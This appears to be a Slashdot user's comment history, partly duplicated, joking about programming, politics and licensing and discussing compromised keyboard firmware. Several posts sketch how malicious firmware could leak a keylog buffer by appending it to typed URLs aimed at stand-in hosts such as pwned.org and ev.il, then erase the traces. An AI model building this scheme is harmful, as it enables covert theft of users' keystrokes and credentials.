$ ed parentpost 474 1 Sadly, I believe that article is quite out of date. Pointers and recursion are so passé to most IT s/most/current/ s/$/./ 1 Sadly, I believe that article is quite out of date. Pointers and recursion are so passé to current IT wq 478 $
Sadly, I believe that article is quite out of date. Pointers and recursion are so passé to most IT
I think today's programmers are said to be horribly out of it when they don't know how to apply the Distributed Observer Pattern to RESTful business logic as a ROA with declarative state transformation rules.
I'm such a useless old fart to today's programming requirements that I'll content myself with some lowly kernel hacking, SAT solver tuning and code optimization.
They can't even give correct change from a pounder...
so they will plonk down a program to do it on their Android phone in an instant.
No, i REFUSE to say iPhone...queue up a large and menacing Apple high up in a tree, poised to fall on to me and smother me with gravity-laden but no less fruity court injunctions...
Pseudonym, pardon me for 'hijacking' this thread, but since you work for NICTA and I'm very interested in this result, I would like to ask:
In the summary, 'verified' and 'unverified' ports are mentioned. Does 'verified' in this context mean: formally proven hardware and compiler design?
Reason I ask is that having a formally proven kernel is of much less practical use when the generated binary doesn't implement the source code correctly, or the hardware doesn't execute the instructions given correctly.
That's the reason why I'm very much in favor of calling them Reds and Blues. In a few years people will have forgotten what these stood for, and actually look at their political agenda when deciding their vote.
Somewhat like someone further up in the thread suggested, use the oldest rule in the mob: take the lion statuette and break it in two. The parts don't come together again until the deal is done.
Split the task in two, have one in-house party guard the keys and crypto but have no access to any databases, files or networks except to provide those directly to staff. Have another (possibly outsourced) party guard the (encrypted) files and backups, but have them have no access to any keys or crypto. The only network connection between the two should always carry encrypted data. Under NO circumstances should any party know anything about the other party. Only trusted staff members should deal with either. That way neither party has anything of value if they compromise their part of the deal.
The role of President is to attract attention so no-one knows who's really in charge. The real President can be anyone, even a solipsistic crazy old man whose only company is his cat.
I wonder when they will start outfitting little kids with monitors (implants, keyloggers, Trojaned webcams, Palm Pre's?) to find out if they are promising recruits to send to Battle School (ROTC?), and who they will eventually pick to fight the Buggers (drug lords, Islam, "ze Terrurists", anti-Capitalists?) for them.
It all depends on whether you see the same cat (or one that looks just like it) pass the same location twice. If you do, that's a déjà vu, and there's a very good chance that they changed something in the Matrix.
Yahoo need to pull their asses out of the Stone Age and join the 21st century and learn to build websites. Two years probation or risk being put in a padded room with the rest of them "mistake HTML for a screen publishing language" reject DTPers with only the W3C compendium on the history and purpose of HTML as a medium-independent markup language for company. Periodical flogging with a 300px x 200px flyswat should be part of daily routine.
If (in the 1900s, or being very rich) I would contract an errand boy or courier to fetch my newspaper at the stand everyday and bring it to me, would it be reasonable for the newspaper publisher to know my personal details? I think not.
Today, the newspaper boy or courier is replaced by programs stored on a computer that checks lists of Kindle users who subscribe to newspaper delivery services, fetches one copy of the paper from the publisher every day, and delivers that to Kindles. Any difference with the first example? I think not.
PP and GPP: good points. The more I think about it, fraud seems actually to be the most likely here.
AP selling licenses to things it cannot grant a license to. Now compare this to someone selling tickets to concerts on a website, for the sale of which he has no license. A classic example of fraud. To make things worse, in this analogy, AP allows people to fill in the name of the act and the name of the venue themselves!
An example (somewhat better worded than the one I gave in an earlier post, I hope) as seen from the keyboard's perspective:
- Wait for the user to finish typing in a (simple) URL by hitting the Enter key.
(Most often, the cursor is now in the URL bar of a browser, It could be that the user is just typing a note or an email, but there are solutions to that, too.)
Example: google.com - Add a string consisting of ".[name of server]/s=[URL encoded string containing keylog buffer]" .
Example of the final URL: google.com.pwned.org/s=Logged%20Data%20In%20Buffer - Add an Enter - Perhaps wait a tiny amount of time for the browser to start connecting to the site - Now, for cleanup in case the user is just writing a document, send the appropriate number of [Delete Word] keystrokes, to restore the URL to the user's original input (on a PC, this would be Ctrl-Backspace, not ^W because this often closes the current window
Note: of course the keyboard should send the data as quickly as possible to give the user no chance to abort the operation by unplugging it.
The virtual website at google.com.pwned.org (mapped from *.pwned.org) could redirect the user to google.com, but since the data has already been sent, this doesn't matter very much.
How many people do you know that have a microwave oven that's NOT connected to the 'net in some way? So that they can go to the little nuker's website from work to program it so they can have a hot steamy pizza right when they get home from working late?
Oops, hacker got there first, now my house's on fire...
What's up next, maintenance heated USB slippers? maintenance HDMI cables?
Security by this kind of obscurity is going to kill us all.
"You know, I bought this USB pogo stick for my Wii, and after using it for a while, my bank account got berserk. The bank manager told me that the pogo stick must have raided my bank account while I was trying out this new online banking thingy on the Wii..."
Simply make ev.il be on a really fast server that immediately redirects the user to persiankitty.com so as not to notice anything... (sorry Israelis, don't want to make you look bad (well, except maybe the Mossad, cough...), except ev.il's a convenient suffix)
Slashdot Mirror
yep, one of the shortest threads on Slashdot before it hit. Anyone know of a shorter one? A First Post Nazi perhaps?
That's one small step for man, a giant leap for the Greys.
$ ed parentpost
474
1
Sadly, I believe that article is quite out of date. Pointers and recursion are so passé to most IT
s/most/current/
s/$/./
1
Sadly, I believe that article is quite out of date. Pointers and recursion are so passé to current IT
wq
478
$
Sadly, I believe that article is quite out of date. Pointers and recursion are so passé to most IT
I think today's programmers are said to be horribly out of it when they don't know how to apply the Distributed Observer Pattern to RESTful business logic as a ROA with declarative state transformation rules.
I'm such a useless old fart to today's programming requirements that I'll content myself with some lowly kernel hacking, SAT solver tuning and code optimization.
They can't even give correct change from a pounder...
so they will plonk down a program to do it on their Android phone in an instant.
No, i REFUSE to say iPhone...queue up a large and menacing Apple high up in a tree, poised to fall on to me and smother me with gravity-laden but no less fruity court injunctions...
Fluff!! The lowly navel lint that may turn out to be the key ingredient to obtaining visions of the future that may save the universe!
Thanks very much for the info. I'll be looking forward to some very interesting developments in this field.
Pseudonym, pardon me for 'hijacking' this thread, but since you work for NICTA and I'm very interested in this result, I would like to ask:
In the summary, 'verified' and 'unverified' ports are mentioned. Does 'verified' in this context mean: formally proven hardware and compiler design?
Reason I ask is that having a formally proven kernel is of much less practical use when the generated binary doesn't implement the source code correctly, or the hardware doesn't execute the instructions given correctly.
That's the reason why I'm very much in favor of calling them Reds and Blues. In a few years people will have forgotten what these stood for, and actually look at their political agenda when deciding their vote.
Somewhat like someone further up in the thread suggested, use the oldest rule in the mob: take the lion statuette and break it in two. The parts don't come together again until the deal is done.
Split the task in two, have one in-house party guard the keys and crypto but have no access to any databases, files or networks except to provide those directly to staff.
Have another (possibly outsourced) party guard the (encrypted) files and backups, but have them have no access to any keys or crypto. The only network connection between the two should always carry encrypted data.
Under NO circumstances should any party know anything about the other party. Only trusted staff members should deal with either.
That way neither party has anything of value if they compromise their part of the deal.
Douglas Adams was right!
The role of President is to attract attention so no-one knows who's really in charge.
The real President can be anyone, even a solipsistic crazy old man whose only company is his cat.
...is unable to comment (yet).
I wonder when they will start outfitting little kids with monitors (implants, keyloggers, Trojaned webcams, Palm Pre's?) to find out if they are promising recruits to send to Battle School (ROTC?), and who they will eventually pick to fight the Buggers (drug lords, Islam, "ze Terrurists", anti-Capitalists?) for them.
It all depends on whether you see the same cat (or one that looks just like it) pass the same location twice. If you do, that's a déjà vu, and there's a very good chance that they changed something in the Matrix.
Yahoo need to pull their asses out of the Stone Age and join the 21st century and learn to build websites. Two years probation or risk being put in a padded room with the rest of them "mistake HTML for a screen publishing language" reject DTPers with only the W3C compendium on the history and purpose of HTML as a medium-independent markup language for company. Periodical flogging with a 300px x 200px flyswat should be part of daily routine.
If (in the 1900s, or being very rich) I would contract an errand boy or courier to fetch my newspaper at the stand everyday and bring it to me, would it be reasonable for the newspaper publisher to know my personal details? I think not.
Today, the newspaper boy or courier is replaced by programs stored on a computer that checks lists of Kindle users who subscribe to newspaper delivery services, fetches one copy of the paper from the publisher every day, and delivers that to Kindles. Any difference with the first example? I think not.
PP and GPP: good points. The more I think about it, fraud seems actually to be the most likely here.
AP selling licenses to things it cannot grant a license to. Now compare this to someone selling tickets to concerts on a website, for the sale of which he has no license. A classic example of fraud. To make things worse, in this analogy, AP allows people to fill in the name of the act and the name of the venue themselves!
If it is still true that Flash memory lasts a limited number of write cycles, reflashing on every boot would eventually kill your devices.
I think it would be better to (periodically) checksum all firmware on devices and raise an alarm if there is any mismatch.
Think outside the box, analyze patterns.
An example (somewhat better worded than the one I gave in an earlier post, I hope) as seen from the keyboard's perspective:
- Wait for the user to finish typing in a (simple) URL by hitting the Enter key.
(Most often, the cursor is now in the URL bar of a browser, It could be that the user is just typing a note or an email, but there are solutions to that, too.)
Example: google.com
- Add a string consisting of ".[name of server]/s=[URL encoded string containing keylog buffer]" .
Example of the final URL: google.com.pwned.org/s=Logged%20Data%20In%20Buffer
- Add an Enter
- Perhaps wait a tiny amount of time for the browser to start connecting to the site
- Now, for cleanup in case the user is just writing a document, send the appropriate number of [Delete Word] keystrokes, to restore the URL to the user's original input (on a PC, this would be Ctrl-Backspace, not ^W because this often closes the current window
Note: of course the keyboard should send the data as quickly as possible to give the user no chance to abort the operation by unplugging it.
The virtual website at google.com.pwned.org (mapped from *.pwned.org) could redirect the user to google.com, but since the data has already been sent, this doesn't matter very much.
Soon, that question will be rephrased:
How many people do you know that have a microwave oven that's NOT connected to the 'net in some way? So that they can go to the little nuker's website from work to program it so they can have a hot steamy pizza right when they get home from working late?
Oops, hacker got there first, now my house's on fire...
What's up next, maintenance heated USB slippers? maintenance HDMI cables?
Security by this kind of obscurity is going to kill us all.
"You know, I bought this USB pogo stick for my Wii, and after using it for a while, my bank account got berserk. The bank manager told me that the pogo stick must have raided my bank account while I was trying out this new online banking thingy on the Wii..."
Its like reverse engineering your old school ball mouse.
I think there must be at least one coke pusher out there who has considered that option. Anyone like to have a mouseball?
...and periodically sends its cachehold of data to the remnants of the Third Reich in hiding?
s/USA/China/g
I reckon that China's shipped about 3 and a quarter bazillion keyboards worldwide by now.
Care to check them all for Flash firmware 'stowaways'?
addendum: ...the user types something like:
persiankitty.com
[and hits the Enter key]
then the keyboard quickly expands this... ...and adds back the Enter key at the end.
haa, just wait until the user types something like:
persiankitty.com
then the keyboard quickly expands this to something like:
persiankitty.com.ev.il/s=[url encoded keylog buffer]
in the blink of an eye.
Simply make ev.il be on a really fast server that immediately redirects the user to persiankitty.com so as not to notice anything... (sorry Israelis, don't want to make you look bad (well, except maybe the Mossad, cough...), except ev.il's a convenient suffix)